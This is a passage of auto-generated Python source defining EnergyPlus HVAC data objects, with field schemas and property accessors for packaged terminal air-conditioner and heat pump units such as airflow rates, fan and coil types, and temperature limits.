| Must be less than or equal to fan size.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Cooling Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `cooling_supply_air_flow_rate` or None if not set
"""
return self["Cooling Supply Air Flow Rate"]
@cooling_supply_air_flow_rate.setter
def cooling_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate`"""
self["Cooling Supply Air Flow Rate"] = value
@property
def heating_supply_air_flow_rate(self):
"""field `Heating Supply Air Flow Rate`
| Must be less than or equal to fan size.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Heating Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `heating_supply_air_flow_rate` or None if not set
"""
return self["Heating Supply Air Flow Rate"]
@heating_supply_air_flow_rate.setter
def heating_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Heating Supply Air Flow Rate`"""
self["Heating Supply Air Flow Rate"] = value
@property
def no_load_supply_air_flow_rate(self):
"""field `No Load Supply Air Flow Rate`
| Must be less than or equal to fan size.
| Only used when supply air fan operating mode schedule values specify continuous fan
| (schedule values greater than 0 specify continuous fan operation).
| This air flow rate is used when no heating or cooling is required and the cooling or
| heating coil is off. If this field is left blank or zero, the supply air flow rate
| from the previous on cycle (either cooling or heating) is used.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `No Load Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `no_load_supply_air_flow_rate` or None if not set
"""
return self["No Load Supply Air Flow Rate"]
@no_load_supply_air_flow_rate.setter
def no_load_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `No Load Supply Air Flow Rate`"""
self["No Load Supply Air Flow Rate"] = value
@property
def cooling_outdoor_air_flow_rate(self):
"""field `Cooling Outdoor Air Flow Rate`
| Must be less than or equal to supply air flow rate during cooling operation.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Cooling Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `cooling_outdoor_air_flow_rate` or None if not set
"""
return self["Cooling Outdoor Air Flow Rate"]
@cooling_outdoor_air_flow_rate.setter
def cooling_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Cooling Outdoor Air Flow Rate`"""
self["Cooling Outdoor Air Flow Rate"] = value
@property
def heating_outdoor_air_flow_rate(self):
"""field `Heating Outdoor Air Flow Rate`
| Must be less than or equal to supply air flow rate during heating operation.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Heating Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `heating_outdoor_air_flow_rate` or None if not set
"""
return self["Heating Outdoor Air Flow Rate"]
@heating_outdoor_air_flow_rate.setter
def heating_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Heating Outdoor Air Flow Rate`"""
self["Heating Outdoor Air Flow Rate"] = value
@property
def no_load_outdoor_air_flow_rate(self):
"""field `No Load Outdoor Air Flow Rate`
| Only used when supply air fan operating mode schedule values specify continuous fan
| (schedule values greater than 0 specify continuous fan operation).
| This air flow rate is used when no heating or cooling is required and the cooling or
| heating coil is off. If this field is left blank or zero, the outdoor air flow rate
| from the previous on cycle (either cooling or heating) is used.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `No Load Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `no_load_outdoor_air_flow_rate` or None if not set
"""
return self["No Load Outdoor Air Flow Rate"]
@no_load_outdoor_air_flow_rate.setter
def no_load_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `No Load Outdoor Air Flow Rate`"""
self["No Load Outdoor Air Flow Rate"] = value
@property
def supply_air_fan_object_type(self):
"""field `Supply Air Fan Object Type`
| Fan:ConstantVolume only works when continuous fan operation is used the entire
| simulation (all supply air fan operating mode schedule values are greater than 0).
| If any fan operating mode schedule values are 0 a Fan:OnOff object must be used.
Args:
value (str): value for IDD Field `Supply Air Fan Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_object_type` or None if not set
"""
return self["Supply Air Fan Object Type"]
@supply_air_fan_object_type.setter
def supply_air_fan_object_type(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Object Type`"""
self["Supply Air Fan Object Type"] = value
@property
def supply_air_fan_name(self):
"""field `Supply Air Fan Name`
| Needs to match in the fan object.
Args:
value (str): value for IDD Field `Supply Air Fan Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_name` or None if not set
"""
return self["Supply Air Fan Name"]
@supply_air_fan_name.setter
def supply_air_fan_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Name`"""
self["Supply Air Fan Name"] = value
@property
def heating_coil_object_type(self):
"""field `Heating Coil Object Type`
| Select the type of heating coil.
Args:
value (str): value for IDD Field `Heating Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_object_type` or None if not set
"""
return self["Heating Coil Object Type"]
@heating_coil_object_type.setter
def heating_coil_object_type(self, value=None):
"""Corresponds to IDD field `Heating Coil Object Type`"""
self["Heating Coil Object Type"] = value
@property
def heating_coil_name(self):
"""field `Heating Coil Name`
| Needs to match in the heating coil object.
Args:
value (str): value for IDD Field `Heating Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_name` or None if not set
"""
return self["Heating Coil Name"]
@heating_coil_name.setter
def heating_coil_name(self, value=None):
"""Corresponds to IDD field `Heating Coil Name`"""
self["Heating Coil Name"] = value
@property
def cooling_coil_object_type(self):
"""field `Cooling Coil Object Type`
| Select the type of Cooling Coil.
| Only works with Coil:Cooling:DX:SingleSpeed or
| CoilSystem:Cooling:DX:HeatExchangerAssisted or
| Coil:Cooling:DX:VariableSpeed.
Args:
value (str): value for IDD Field `Cooling Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_object_type` or None if not set
"""
return self["Cooling Coil Object Type"]
@cooling_coil_object_type.setter
def cooling_coil_object_type(self, value=None):
"""Corresponds to IDD field `Cooling Coil Object Type`"""
self["Cooling Coil Object Type"] = value
@property
def cooling_coil_name(self):
"""field `Cooling Coil Name`
| Needs to match a DX cooling coil object.
Args:
value (str): value for IDD Field `Cooling Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_name` or None if not set
"""
return self["Cooling Coil Name"]
@cooling_coil_name.setter
def cooling_coil_name(self, value=None):
"""Corresponds to IDD field `Cooling Coil Name`"""
self["Cooling Coil Name"] = value
@property
def fan_placement(self):
"""field `Fan Placement`
| Select fan placement as either blow through or draw through.
| Default value: DrawThrough
Args:
value (str): value for IDD Field `Fan Placement`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `fan_placement` or None if not set
"""
return self["Fan Placement"]
@fan_placement.setter
def fan_placement(self, value="DrawThrough"):
"""Corresponds to IDD field `Fan Placement`"""
self["Fan Placement"] = value
@property
def supply_air_fan_operating_mode_schedule_name(self):
"""field `Supply Air Fan Operating Mode Schedule Name`
| Enter the name of a schedule that controls fan operation. Schedule Name values of 0 denote
| cycling fan operation (fan cycles with cooling or heating coil). Schedule Name values greater
| than 0 denote constant fan operation (fan runs continually regardless of coil operation).
Args:
value (str): value for IDD Field `Supply Air Fan Operating Mode Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_operating_mode_schedule_name` or None if not set
"""
return self["Supply Air Fan Operating Mode Schedule Name"]
@supply_air_fan_operating_mode_schedule_name.setter
def supply_air_fan_operating_mode_schedule_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Operating Mode Schedule
Name`"""
self["Supply Air Fan Operating Mode Schedule Name"] = value
@property
def availability_manager_list_name(self):
"""field `Availability Manager List Name`
| Enter the name of an AvailabilityManagerAssignmentList object.
Args:
value (str): value for IDD Field `Availability Manager List Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_manager_list_name` or None if not set
"""
return self["Availability Manager List Name"]
@availability_manager_list_name.setter
def availability_manager_list_name(self, value=None):
"""Corresponds to IDD field `Availability Manager List Name`"""
self["Availability Manager List Name"] = value
@property
def design_specification_zonehvac_sizing_object_name(self):
"""field `Design Specification ZoneHVAC Sizing Object Name`
| Enter the name of a DesignSpecificationZoneHVACSizing object.
Args:
value (str): value for IDD Field `Design Specification ZoneHVAC Sizing Object Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `design_specification_zonehvac_sizing_object_name` or None if not set
"""
return self["Design Specification ZoneHVAC Sizing Object Name"]
@design_specification_zonehvac_sizing_object_name.setter
def design_specification_zonehvac_sizing_object_name(self, value=None):
"""Corresponds to IDD field `Design Specification ZoneHVAC Sizing
Object Name`"""
self["Design Specification ZoneHVAC Sizing Object Name"] = value
class ZoneHvacPackagedTerminalHeatPump(DataObject):
""" Corresponds to IDD object `ZoneHVAC:PackagedTerminalHeatPump`
Packaged terminal heat pump (PTHP). Forced-convection heating-cooling unit with
supply fan, direct expansion (DX) cooling coil, DX heating coil (air-to-air heat
pump), supplemental heating coil (gas, electric, hot water, or steam), and
fixed-position outdoor air mixer.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'availability schedule name',
{'name': u'Availability Schedule Name',
'pyname': u'availability_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'air inlet node name',
{'name': u'Air Inlet Node Name',
'pyname': u'air_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'air outlet node name',
{'name': u'Air Outlet Node Name',
'pyname': u'air_outlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'outdoor air mixer object type',
{'name': u'Outdoor Air Mixer Object Type',
'pyname': u'outdoor_air_mixer_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'OutdoorAir:Mixer'],
'autocalculatable': False,
'type': 'alpha'}),
(u'outdoor air mixer name',
{'name': u'Outdoor Air Mixer Name',
'pyname': u'outdoor_air_mixer_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling supply air flow rate',
{'name': u'Cooling Supply Air Flow Rate',
'pyname': u'cooling_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating supply air flow rate',
{'name': u'Heating Supply Air Flow Rate',
'pyname': u'heating_supply_air_flow_rate',
'minimum>': 0.0,
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'no load supply air flow rate',
{'name': u'No Load Supply Air Flow Rate',
'pyname': u'no_load_supply_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'cooling outdoor air flow rate',
{'name': u'Cooling Outdoor Air Flow Rate',
'pyname': u'cooling_outdoor_air_flow_rate',
'required-field': True,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'heating outdoor air flow rate',
{'name': u'Heating Outdoor Air Flow Rate',
'pyname': u'heating_outdoor_air_flow_rate',
'required-field': True,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'no load outdoor air flow rate',
{'name': u'No Load Outdoor Air Flow Rate',
'pyname': u'no_load_outdoor_air_flow_rate',
'required-field': False,
'autosizable': True,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'm3/s'}),
(u'supply air fan object type',
{'name': u'Supply Air Fan Object Type',
'pyname': u'supply_air_fan_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Fan:OnOff',
u'Fan:ConstantVolume'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan name',
{'name': u'Supply Air Fan Name',
'pyname': u'supply_air_fan_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'heating coil object type',
{'name': u'Heating Coil Object Type',
'pyname': u'heating_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Heating:DX:SingleSpeed',
u'Coil:Heating:DX:VariableSpeed'],
'autocalculatable': False,
'type': 'alpha'}),
(u'heating coil name',
{'name': u'Heating Coil Name',
'pyname': u'heating_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'heating convergence tolerance',
{'name': u'Heating Convergence Tolerance',
'pyname': u'heating_convergence_tolerance',
'default': 0.001,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'minimum outdoor dry-bulb temperature for compressor operation',
{'name': u'Minimum Outdoor Dry-Bulb Temperature for Compressor Operation',
'pyname': u'minimum_outdoor_drybulb_temperature_for_compressor_operation',
'default': -8.0,
'required-field': False,
'autosizable': False,
'minimum': -20.0,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'cooling coil object type',
{'name': u'Cooling Coil Object Type',
'pyname': u'cooling_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Cooling:DX:SingleSpeed',
u'Coil:Cooling:DX:VariableSpeed',
u'CoilSystem:Cooling:DX:HeatExchangerAssisted'],
'autocalculatable': False,
'type': 'alpha'}),
(u'cooling coil name',
{'name': u'Cooling Coil Name',
'pyname': u'cooling_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'cooling convergence tolerance',
{'name': u'Cooling Convergence Tolerance',
'pyname': u'cooling_convergence_tolerance',
'default': 0.001,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'supplemental heating coil object type',
{'name': u'Supplemental Heating Coil Object Type',
'pyname': u'supplemental_heating_coil_object_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'Coil:Heating:Gas',
u'Coil:Heating:Electric',
u'Coil:Heating:Water',
u'Coil:Heating:Steam'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supplemental heating coil name',
{'name': u'Supplemental Heating Coil Name',
'pyname': u'supplemental_heating_coil_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'maximum supply air temperature from supplemental heater',
{'name': u'Maximum Supply Air Temperature from Supplemental Heater',
'pyname': u'maximum_supply_air_temperature_from_supplemental_heater',
'required-field': True,
'autosizable': True,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'maximum outdoor dry-bulb temperature for supplemental heater operation',
{'name': u'Maximum Outdoor Dry-Bulb Temperature for Supplemental Heater Operation',
'pyname': u'maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation',
'default': 21.0,
'maximum': 21.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'C'}),
(u'fan placement',
{'name': u'Fan Placement',
'pyname': u'fan_placement',
'default': u'DrawThrough',
'required-field': False,
'autosizable': False,
'accepted-values': [u'BlowThrough',
u'DrawThrough'],
'autocalculatable': False,
'type': 'alpha'}),
(u'supply air fan operating mode schedule name',
{'name': u'Supply Air Fan Operating Mode Schedule Name',
'pyname': u'supply_air_fan_operating_mode_schedule_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'availability manager list name',
{'name': u'Availability Manager List Name',
'pyname': u'availability_manager_list_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'design specification zonehvac sizing object name',
{'name': u'Design Specification ZoneHVAC Sizing Object Name',
'pyname': u'design_specification_zonehvac_sizing_object_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'})]),
'format': None,
'group': u'Zone HVAC Forced Air Units',
'min-fields': 27,
'name': u'ZoneHVAC:PackagedTerminalHeatPump',
'pyname': u'ZoneHvacPackagedTerminalHeatPump',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
| Unique name for this packaged terminal heat pump object.
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def availability_schedule_name(self):
"""field `Availability Schedule Name`
| Availability schedule name for this system. Schedule value > 0 means the system is available.
| If this field is blank, the system is always available.
| Schedule values of 0 denote the unit is off.
Args:
value (str): value for IDD Field `Availability Schedule Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `availability_schedule_name` or None if not set
"""
return self["Availability Schedule Name"]
@availability_schedule_name.setter
def availability_schedule_name(self, value=None):
"""Corresponds to IDD field `Availability Schedule Name`"""
self["Availability Schedule Name"] = value
@property
def air_inlet_node_name(self):
"""field `Air Inlet Node Name`
| Air inlet node for the PTHP must be a zone air exhaust node.
Args:
value (str): value for IDD Field `Air Inlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_inlet_node_name` or None if not set
"""
return self["Air Inlet Node Name"]
@air_inlet_node_name.setter
def air_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Inlet Node Name`"""
self["Air Inlet Node Name"] = value
@property
def air_outlet_node_name(self):
"""field `Air Outlet Node Name`
| Air outlet node for the PTHP must be a zone air inlet node.
Args:
value (str): value for IDD Field `Air Outlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `air_outlet_node_name` or None if not set
"""
return self["Air Outlet Node Name"]
@air_outlet_node_name.setter
def air_outlet_node_name(self, value=None):
"""Corresponds to IDD field `Air Outlet Node Name`"""
self["Air Outlet Node Name"] = value
@property
def outdoor_air_mixer_object_type(self):
"""field `Outdoor Air Mixer Object Type`
| currently only one OutdoorAir:Mixer object type is available.
Args:
value (str): value for IDD Field `Outdoor Air Mixer Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_mixer_object_type` or None if not set
"""
return self["Outdoor Air Mixer Object Type"]
@outdoor_air_mixer_object_type.setter
def outdoor_air_mixer_object_type(self, value=None):
"""Corresponds to IDD field `Outdoor Air Mixer Object Type`"""
self["Outdoor Air Mixer Object Type"] = value
@property
def outdoor_air_mixer_name(self):
"""field `Outdoor Air Mixer Name`
| Needs to match name of outdoor air mixer object.
Args:
value (str): value for IDD Field `Outdoor Air Mixer Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `outdoor_air_mixer_name` or None if not set
"""
return self["Outdoor Air Mixer Name"]
@outdoor_air_mixer_name.setter
def outdoor_air_mixer_name(self, value=None):
"""Corresponds to IDD field `Outdoor Air Mixer Name`"""
self["Outdoor Air Mixer Name"] = value
@property
def cooling_supply_air_flow_rate(self):
"""field `Cooling Supply Air Flow Rate`
| Must be less than or equal to fan size.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Cooling Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `cooling_supply_air_flow_rate` or None if not set
"""
return self["Cooling Supply Air Flow Rate"]
@cooling_supply_air_flow_rate.setter
def cooling_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Cooling Supply Air Flow Rate`"""
self["Cooling Supply Air Flow Rate"] = value
@property
def heating_supply_air_flow_rate(self):
"""field `Heating Supply Air Flow Rate`
| Must be less than or equal to fan size.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Heating Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `heating_supply_air_flow_rate` or None if not set
"""
return self["Heating Supply Air Flow Rate"]
@heating_supply_air_flow_rate.setter
def heating_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Heating Supply Air Flow Rate`"""
self["Heating Supply Air Flow Rate"] = value
@property
def no_load_supply_air_flow_rate(self):
"""field `No Load Supply Air Flow Rate`
| Must be less than or equal to fan size.
| Only used when heat pump fan operating mode is continuous. This air flow rate
| is used when no heating or cooling is required and the DX coil compressor is off.
| If this field is left blank or zero, the supply air flow rate from the previous on cycle
| (either cooling or heating) is used.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `No Load Supply Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `no_load_supply_air_flow_rate` or None if not set
"""
return self["No Load Supply Air Flow Rate"]
@no_load_supply_air_flow_rate.setter
def no_load_supply_air_flow_rate(self, value=None):
"""Corresponds to IDD field `No Load Supply Air Flow Rate`"""
self["No Load Supply Air Flow Rate"] = value
@property
def cooling_outdoor_air_flow_rate(self):
"""field `Cooling Outdoor Air Flow Rate`
| Must be less than or equal to supply air flow rate during cooling operation.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Cooling Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `cooling_outdoor_air_flow_rate` or None if not set
"""
return self["Cooling Outdoor Air Flow Rate"]
@cooling_outdoor_air_flow_rate.setter
def cooling_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Cooling Outdoor Air Flow Rate`"""
self["Cooling Outdoor Air Flow Rate"] = value
@property
def heating_outdoor_air_flow_rate(self):
"""field `Heating Outdoor Air Flow Rate`
| Must be less than or equal to supply air flow rate during heating operation.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `Heating Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `heating_outdoor_air_flow_rate` or None if not set
"""
return self["Heating Outdoor Air Flow Rate"]
@heating_outdoor_air_flow_rate.setter
def heating_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `Heating Outdoor Air Flow Rate`"""
self["Heating Outdoor Air Flow Rate"] = value
@property
def no_load_outdoor_air_flow_rate(self):
"""field `No Load Outdoor Air Flow Rate`
| Only used when heat pump Fan operating mode is continuous. This air flow rate
| is used when no heating or cooling is required and the DX coil compressor is off.
| If this field is left blank or zero, the outdoor air flow rate from the previous on cycle
| (either cooling or heating) is used.
| Units: m3/s
Args:
value (float or "Autosize"): value for IDD Field `No Load Outdoor Air Flow Rate`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `no_load_outdoor_air_flow_rate` or None if not set
"""
return self["No Load Outdoor Air Flow Rate"]
@no_load_outdoor_air_flow_rate.setter
def no_load_outdoor_air_flow_rate(self, value=None):
"""Corresponds to IDD field `No Load Outdoor Air Flow Rate`"""
self["No Load Outdoor Air Flow Rate"] = value
@property
def supply_air_fan_object_type(self):
"""field `Supply Air Fan Object Type`
| Fan:ConstantVolume only works with fan operating mode is continuous.
Args:
value (str): value for IDD Field `Supply Air Fan Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_object_type` or None if not set
"""
return self["Supply Air Fan Object Type"]
@supply_air_fan_object_type.setter
def supply_air_fan_object_type(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Object Type`"""
self["Supply Air Fan Object Type"] = value
@property
def supply_air_fan_name(self):
"""field `Supply Air Fan Name`
| Needs to match a fan object.
Args:
value (str): value for IDD Field `Supply Air Fan Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supply_air_fan_name` or None if not set
"""
return self["Supply Air Fan Name"]
@supply_air_fan_name.setter
def supply_air_fan_name(self, value=None):
"""Corresponds to IDD field `Supply Air Fan Name`"""
self["Supply Air Fan Name"] = value
@property
def heating_coil_object_type(self):
"""field `Heating Coil Object Type`
| Only works with Coil:Heating:DX:SingleSpeed or
| Coil:Heating:DX:VariableSpeed.
Args:
value (str): value for IDD Field `Heating Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_object_type` or None if not set
"""
return self["Heating Coil Object Type"]
@heating_coil_object_type.setter
def heating_coil_object_type(self, value=None):
"""Corresponds to IDD field `Heating Coil Object Type`"""
self["Heating Coil Object Type"] = value
@property
def heating_coil_name(self):
"""field `Heating Coil Name`
| Needs to match in the DX Heating Coil object.
Args:
value (str): value for IDD Field `Heating Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `heating_coil_name` or None if not set
"""
return self["Heating Coil Name"]
@heating_coil_name.setter
def heating_coil_name(self, value=None):
"""Corresponds to IDD field `Heating Coil Name`"""
self["Heating Coil Name"] = value
@property
def heating_convergence_tolerance(self):
"""field `Heating Convergence Tolerance`
| Defines Heating convergence tolerance as a fraction of Heating load to be met.
| Units: dimensionless
| Default value: 0.001
Args:
value (float): value for IDD Field `Heating Convergence Tolerance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `heating_convergence_tolerance` or None if not set
"""
return self["Heating Convergence Tolerance"]
@heating_convergence_tolerance.setter
def heating_convergence_tolerance(self, value=0.001):
"""Corresponds to IDD field `Heating Convergence Tolerance`"""
self["Heating Convergence Tolerance"] = value
@property
def minimum_outdoor_drybulb_temperature_for_compressor_operation(self):
"""field `Minimum Outdoor Dry-Bulb Temperature for Compressor Operation`
| Needs to match the corresponding minimum outdoor temperature defined
| in the DX Heating Coil object.
| Units: C
| Default value: -8.0
| value >= -20.0
Args:
value (float): value for IDD Field `Minimum Outdoor Dry-Bulb Temperature for Compressor Operation`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_outdoor_drybulb_temperature_for_compressor_operation` or None if not set
"""
return self[
"Minimum Outdoor Dry-Bulb Temperature for Compressor Operation"]
@minimum_outdoor_drybulb_temperature_for_compressor_operation.setter
def minimum_outdoor_drybulb_temperature_for_compressor_operation(
self,
value=-
8.0):
""" Corresponds to IDD field `Minimum Outdoor Dry-Bulb Temperature for Compressor Operation`
"""
self[
"Minimum Outdoor Dry-Bulb Temperature for Compressor Operation"] = value
@property
def cooling_coil_object_type(self):
"""field `Cooling Coil Object Type`
| Only works with Coil:Cooling:DX:SingleSpeed or
| CoilSystem:Cooling:DX:HeatExchangerAssisted or
| Coil:Cooling:DX:VariableSpeed.
Args:
value (str): value for IDD Field `Cooling Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_object_type` or None if not set
"""
return self["Cooling Coil Object Type"]
@cooling_coil_object_type.setter
def cooling_coil_object_type(self, value=None):
"""Corresponds to IDD field `Cooling Coil Object Type`"""
self["Cooling Coil Object Type"] = value
@property
def cooling_coil_name(self):
"""field `Cooling Coil Name`
| Needs to match in the DX Cooling Coil object.
Args:
value (str): value for IDD Field `Cooling Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `cooling_coil_name` or None if not set
"""
return self["Cooling Coil Name"]
@cooling_coil_name.setter
def cooling_coil_name(self, value=None):
"""Corresponds to IDD field `Cooling Coil Name`"""
self["Cooling Coil Name"] = value
@property
def cooling_convergence_tolerance(self):
"""field `Cooling Convergence Tolerance`
| Defines Cooling convergence tolerance as a fraction of the Cooling load to be met.
| Units: dimensionless
| Default value: 0.001
Args:
value (float): value for IDD Field `Cooling Convergence Tolerance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `cooling_convergence_tolerance` or None if not set
"""
return self["Cooling Convergence Tolerance"]
@cooling_convergence_tolerance.setter
def cooling_convergence_tolerance(self, value=0.001):
"""Corresponds to IDD field `Cooling Convergence Tolerance`"""
self["Cooling Convergence Tolerance"] = value
@property
def supplemental_heating_coil_object_type(self):
"""field `Supplemental Heating Coil Object Type`
| works with gas, electric, hot water and steam heating coil.
Args:
value (str): value for IDD Field `Supplemental Heating Coil Object Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supplemental_heating_coil_object_type` or None if not set
"""
return self["Supplemental Heating Coil Object Type"]
@supplemental_heating_coil_object_type.setter
def supplemental_heating_coil_object_type(self, value=None):
"""Corresponds to IDD field `Supplemental Heating Coil Object Type`"""
self["Supplemental Heating Coil Object Type"] = value
@property
def supplemental_heating_coil_name(self):
"""field `Supplemental Heating Coil Name`
| Needs to match in the supplemental heating coil object.
Args:
value (str): value for IDD Field `Supplemental Heating Coil Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `supplemental_heating_coil_name` or None if not set
"""
return self["Supplemental Heating Coil Name"]
@supplemental_heating_coil_name.setter
def supplemental_heating_coil_name(self, value=None):
"""Corresponds to IDD field `Supplemental Heating Coil Name`"""
self["Supplemental Heating Coil Name"] = value
@property
def maximum_supply_air_temperature_from_supplemental_heater(self):
"""field `Maximum Supply Air Temperature from Supplemental Heater`
| Supply air temperature from the supplemental heater will not exceed this value.
| Units: C
Args:
value (float or "Autosize"): value for IDD Field `Maximum Supply Air Temperature from Supplemental Heater`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autosize": the value of `maximum_supply_air_temperature_from_supplemental_heater` or None if not set
"""
return self["Maximum Supply Air Temperature from Supplemental Heater"]
@maximum_supply_air_temperature_from_supplemental_heater.setter
def maximum_supply_air_temperature_from_supplemental_heater(
self,
value=None):
"""Corresponds to IDD field `Maximum Supply Air Temperature from
Supplemental Heater`"""
self["Maximum Supply Air Temperature from Supplemental Heater"] = value
@property
def maximum_outdoor_drybulb_temperature_for_supplemental_heater_operation(
self):
